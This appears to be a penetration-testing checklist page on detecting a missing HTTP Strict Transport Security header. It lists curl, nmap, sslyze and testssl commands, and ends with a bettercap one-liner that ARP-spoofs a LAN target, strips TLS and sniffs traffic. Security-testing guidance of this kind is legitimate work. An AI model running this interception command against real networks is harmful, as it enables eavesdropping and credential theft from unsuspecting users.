HTTP Strict Transport Security

Check List

Review the HSTS header and its validity.

Methodology

Missing HSTS (HTTP Strict Transport Security)

Access the Target URL and Inspect the Response Headers Use a tool such as Burp Suite, cURL, or browser dev tools to inspect the HTTP response headers The best way is to use this cheat sheet Example using cURL

Check for HSTS Header Confirm the absence of the following header in the server response Strict-Transport-Security The best way to exploit and exploit this vulnerability is to use a cheat sheet

Cheat Sheet

Recon Header

cURL

curl -s -D- $WEBSITE | grep -i strict

Nmap

nmap -sS -sV --mtu 5000 --script ssl-enum-ciphers $WEBSITE

Scan Vulnerabilities

sslyze

sslyze $WEBSITE

testssl.sh

testssl $WEBSITE

MitM

Bettercap

Interface Network

INTERFACE=$(ip -o -4 addr show | awk '{print $2}' | grep -v "lo" | head -n 1)

MitM on LAN

bettercap -iface $INTERFACE -eval "set arp.spoof.targets $TARGET; arp.spoof on; http.proxy on; http.proxy.sslstrip true; net.sniff on"

PreviousHTTP Methods NextRIA Cross Domain Policy

Last updated 4 months ago

hashtagCheck List

hashtagMethodology

hashtagMissing HSTS (HTTP Strict Transport Security)

hashtagCheat Sheet

hashtagRecon Header

hashtagcURLarrow-up-right

hashtagNmaparrow-up-right

hashtagScan Vulnerabilities

hashtagsslyzearrow-up-right

hashtagtestssl.sharrow-up-right

hashtagMitM

hashtagBettercaparrow-up-right